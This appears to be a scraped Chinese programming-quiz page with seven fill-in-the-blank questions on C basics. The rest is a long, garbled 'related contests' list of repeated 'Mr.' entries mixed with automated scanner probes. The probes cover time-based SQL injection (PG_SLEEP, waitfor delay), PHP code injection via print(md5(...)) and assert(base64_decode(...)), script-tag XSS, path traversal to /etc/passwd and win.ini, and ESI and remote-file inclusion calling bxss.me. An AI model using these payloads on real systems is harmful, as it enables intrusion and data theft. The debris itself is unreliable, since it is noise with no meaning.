#1. 第一章 填空题

第一章 填空题

  1. 程序设计语言的发展经历了几个阶段:机器语言,汇编语言和__。 {{ input(1) }}

  2. 程序设计语言的基本功能包括数据表达与__。 {{ input(2) }}

  3. 算法的表示可以有多种形式,如文字表示、流程图表示、伪代码和__表示等。 {{ input(3) }}

  4. C语言提供了__种运算符。 {{ input(4) }}

  5. C语言共有__个关键字。 {{ input(5) }}

  6. 一个C程序总是从__函数开始执行的。 {{ input(6) }}

  7. 使用C语言求解实际问题,从编写程序到上机运行,一般要经过以下几个步骤。编辑源程序、__与库函数链接以及运行目标程序。 {{ input(7) }}

统计

相关

在下列比赛中:

@@kvMDF

1'"

1%00%C0%A7%C0%A2%252527%252522

TmUNTlso')) OR 712=(SELECT 712 FROM PG_SLEEP(15))--

G1MWopx1') OR 207=(SELECT 207 FROM PG_SLEEP(15))--

IwigEPkQ' OR 196=(SELECT 196 FROM PG_SLEEP(15))--

vNyiLBDS'; waitfor delay '0:0:15' --

1 waitfor delay '0:0:15' --

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

if(now()=sysdate(),sleep(15),0)

-1" OR 2+59-59-1=0+0+0+1 --

-1' OR 2+344-344-1=0+0+0+1 or 'vIz1EUAe'='

-1' OR 2+970-970-1=0+0+0+1 --

-1 OR 2+922-922-1=0+0+0+1

-1 OR 2+873-873-1=0+0+0+1 --

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.9085762

'"()&%<acx><ScRiPt >zl2W(9325)</ScRiPt>

Mr.'"()&%<acx><ScRiPt >zl2W(9589)</ScRiPt>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'.print(md5(31337)).'

Mr.

${@print(md5(31337))}\

Mr.

${@print(md5(31337))}

";print(md5(31337));$a="

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

';print(md5(31337));$a='

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

create/.

Mr.

<!--

Mr.

create

'"

create

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

/xfs.bxss.me

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

Mr.

Mr.

Http://bxss.me/t/fit.txt

1some_inexistent_file_with_long_name.

Mr.

http://bxss.me/t/fit.txt?.

Mr.

Mr.

Mr.

Mr.

bxss.me

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'"()

!(()&&!|*|*|

^(#$!@#$)(()))******

Mr.

Mr.

Mr.

Mr.

)

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../Mr.

Mr.

Mr.

Mr.

Mr.

'+response.write(9533869*9066043)+'

"+response.write(9533869*9066043)+"

Mr.

Mr.

response.write(9533869*9066043)

../../../../../../../../../../../../../../windows/win.ini

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${10000077+9999287}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<esi:include src="http://bxss.me/rpb.png"/>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.9566901

'"()&%<acx><ScRiPt >Gm4v(9137)</ScRiPt>

Mr.'"()&%<acx><ScRiPt >Gm4v(9290)</ScRiPt>

Mr.

Mr.

Mr.

@@lQTQ9

1%00%C0%A7%C0%A2%252527%252522

1'"

NksiX2EW')) OR 141=(SELECT 141 FROM PG_SLEEP(15))--

CH330eD5') OR 75=(SELECT 75 FROM PG_SLEEP(15))--

XPZ6r0vV' OR 371=(SELECT 371 FROM PG_SLEEP(15))--

6EEmauFz'; waitfor delay '0:0:15' --

1 waitfor delay '0:0:15' --

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

if(now()=sysdate(),sleep(15),0)

-1" OR 2+893-893-1=0+0+0+1 --

-1' OR 2+174-174-1=0+0+0+1 --

-1' OR 2+261-261-1=0+0+0+1 or 'UcP73JhN'='

-1 OR 2+682-682-1=0+0+0+1

-1 OR 2+45-45-1=0+0+0+1 --

Mr.

Mr.

Mr.

Mr.

Mr.

@@AZDuW

1%00%C0%A7%C0%A2%252527%252522

1'"

Mr.

TIXbBklW')) OR 268=(SELECT 268 FROM PG_SLEEP(15))--

w9o8rbOw') OR 228=(SELECT 228 FROM PG_SLEEP(15))--

Mr.

2lCYXQJn' OR 769=(SELECT 769 FROM PG_SLEEP(15))--

03AZFNJ7'; waitfor delay '0:0:15' --

Mr.

1 waitfor delay '0:0:15' --

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

-1 OR 2+328-328-1=0+0+0+1

-1" OR 2+32-32-1=0+0+0+1 --

-1' OR 2+792-792-1=0+0+0+1 --

if(now()=sysdate(),sleep(15),0)

-1' OR 2+237-237-1=0+0+0+1 or '11nIHwfv'='

-1 OR 2+439-439-1=0+0+0+1 --

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${@print(md5(31337))}\

Mr.

'.print(md5(31337)).'

";print(md5(31337));$a="

${@print(md5(31337))}

';print(md5(31337));$a='

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

Mr.

create/.

create

Mr.

Mr.

Mr.

create

Mr.

Mr.

Mr.

Mr.

Mr.

<!--

Mr.

'"()&%<acx><ScRiPt >OfNM(9236)</ScRiPt>

Mr.

Mr.9761212

'"

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.'"()&%<acx><ScRiPt >OfNM(9729)</ScRiPt>

Mr.

Mr.

Mr.

Mr.

Mr.

/xfs.bxss.me

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

bxss.me/t/xss.html?%00

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

bxss.me

Mr.

Mr.

Http://bxss.me/t/fit.txt

Mr.

http://bxss.me/t/fit.txt?.

Mr.

Mr.

1some_inexistent_file_with_long_name.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'"()

Mr.

Mr.9130075

Mr.

Mr.

'"()&%<acx><ScRiPt >hFou(9435)</ScRiPt>

^(#$!@#$)(()))******

Mr.

!(()&&!|*|*|

Mr.

Mr.'"()&%<acx><ScRiPt >hFou(9206)</ScRiPt>

Mr.

Mr.

)

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'+response.write(9938740*9212927)+'

Mr.

"+response.write(9938740*9212927)+"

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

response.write(9938740*9212927)

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${9999193+10000061}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<esi:include src="http://bxss.me/rpb.png"/>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${@print(md5(31337))}\

Mr.

Mr.

Mr.

Mr.

Mr.

${@print(md5(31337))}

Mr.

Mr.

'.print(md5(31337)).'

Mr.

Mr.

Mr.

Mr.

Mr.

";print(md5(31337));$a="

';print(md5(31337));$a='

Mr.

Mr.

Mr.

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

<!--

Mr.

'"

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

create

Mr.

create

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

create/.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

@@Sd39O

Mr.

Mr.

Mr.

Mr.

1%00%C0%A7%C0%A2%252527%252522

Mr.

Mr.

Mr.

1'"

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

/xfs.bxss.me

Mr.

Mr.

0uo1UjHl')) OR 487=(SELECT 487 FROM PG_SLEEP(15))--

bxss.me/t/xss.html?%00

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

wFqPXvpG' OR 492=(SELECT 492 FROM PG_SLEEP(15))--

Mr.

Mr.

Goj3Eweg') OR 321=(SELECT 321 FROM PG_SLEEP(15))--

Mr.

Mr.

Mr.

vhXHRDO8'; waitfor delay '0:0:15' --

Mr.

Mr.

Mr.

1 waitfor delay '0:0:15' --

Mr.

Mr.

Mr.

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

Mr.

if(now()=sysdate(),sleep(15),0)

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

-1" OR 2+969-969-1=0+0+0+1 --

Mr.

Mr.

-1' OR 2+49-49-1=0+0+0+1 or 'QplTXCwm'='

Mr.

Mr.

Mr.

Mr.

Mr.

http://bxss.me/t/fit.txt?.

-1 OR 2+282-282-1=0+0+0+1 --

Mr.

-1 OR 2+44-44-1=0+0+0+1

-1' OR 2+477-477-1=0+0+0+1 --

Mr.

bxss.me

Mr.

Mr.

1some_inexistent_file_with_long_name.

Http://bxss.me/t/fit.txt

Mr.

Mr.

@@9p6wg

1%00%C0%A7%C0%A2%252527%252522

1'"

Mr.

Mr.

BXKI7i55')) OR 629=(SELECT 629 FROM PG_SLEEP(15))--

Mr.

Mr.

Mr.

Mr.

V68CH5au') OR 280=(SELECT 280 FROM PG_SLEEP(15))--

Mr.

Mr.

Mr.

!(()&&!|*|*|

Mr.

vVveoLls' OR 120=(SELECT 120 FROM PG_SLEEP(15))--

Mr.

Mr.

^(#$!@#$)(()))******

Mr.

Mr.

OF0csnLO'; waitfor delay '0:0:15' --

Mr.

)

Mr.

Mr.

Mr.

1 waitfor delay '0:0:15' --

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

'"()

Mr.

Mr.

Mr.

if(now()=sysdate(),sleep(15),0)

Mr.

Mr.

Mr.

Mr.

Mr.

-1' OR 2+42-42-1=0+0+0+1 --

Mr.

-1 OR 2+243-243-1=0+0+0+1 --

Mr.

Mr.

-1 OR 2+544-544-1=0+0+0+1

-1" OR 2+37-37-1=0+0+0+1 --

-1' OR 2+291-291-1=0+0+0+1 or 'vp64Iydv'='

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../Mr.

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

Mr.

Mr.

Mr.

Mr.

Mr.

'+response.write(9779466*9126066)+'

Mr.

Mr.

Mr.

Mr.

Mr.

${10000267+10000019}

Mr.

Mr.

Mr.

Mr.

"+response.write(9779466*9126066)+"

Mr.

../../../../../../../../../../../../../../etc/passwd

response.write(9779466*9126066)

Mr.

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<esi:include src="http://bxss.me/rpb.png"/>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

create/.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

create

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

create

Mr.

Mr.

Mr.

Mr.

Mr.

<!--

'"

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'.print(md5(31337)).'

${@print(md5(31337))}\

';print(md5(31337));$a='

Mr.

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

${@print(md5(31337))}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.9816295

";print(md5(31337));$a="

'"()&%<acx><ScRiPt >ifoy(9971)</ScRiPt>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.'"()&%<acx><ScRiPt >ifoy(9715)</ScRiPt>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

/xfs.bxss.me

Mr.

Mr.

Mr.

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

bxss.me

Mr.

Mr.

Mr.

Mr.

http://bxss.me/t/fit.txt?.

1some_inexistent_file_with_long_name.

Mr.

Mr.

Mr.

Mr.

Http://bxss.me/t/fit.txt

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

!(()&&!|*|*|

^(#$!@#$)(()))******

Mr.

'"()

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

)

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'.print(md5(31337)).'

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

Mr.

Mr.

Mr.

Mr.

Mr.

${@print(md5(31337))}\

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${@print(md5(31337))}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

";print(md5(31337));$a="

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

';print(md5(31337));$a='

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${9999137+9999057}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

"+response.write(9714475*9800829)+"

'+response.write(9714475*9800829)+'

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<esi:include src="http://bxss.me/rpb.png"/>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

response.write(9714475*9800829)

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

create/.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'"

Mr.

Mr.

Mr.

<!--

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

create

create

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

/xfs.bxss.me

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

bxss.me

Mr.

Mr.

Mr.

http://bxss.me/t/fit.txt?.

Mr.

bxss.me/t/xss.html?%00

Mr.

Mr.

Http://bxss.me/t/fit.txt

HttP://bxss.me/t/xss.html?%00

1some_inexistent_file_with_long_name.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../Mr.

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

!(()&&!|*|*|

'"()

^(#$!@#$)(()))******

Mr.

Mr.

Mr.

)

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<esi:include src="http://bxss.me/rpb.png"/>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${9999882+10000225}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

"+response.write(9194291*9680038)+"

Mr.

Mr.

'+response.write(9194291*9680038)+'

Mr.

Mr.

response.write(9194291*9680038)

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

1BgINGI0IgO

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.9954293

@@845Pu

'"()&%<acx><ScRiPt >ZmCr(9760)</ScRiPt>

1%00%C0%A7%C0%A2%252527%252522

Mr.'"()&%<acx><ScRiPt >ZmCr(9886)</ScRiPt>

Mr.

1'"

spRdU3Fb')) OR 710=(SELECT 710 FROM PG_SLEEP(15))--

Mr.

Tj4K5EIS') OR 880=(SELECT 880 FROM PG_SLEEP(15))--

wqxiajzS'; waitfor delay '0:0:15' --

EDdef33C' OR 155=(SELECT 155 FROM PG_SLEEP(15))--

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

if(now()=sysdate(),sleep(15),0)

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1 waitfor delay '0:0:15' --

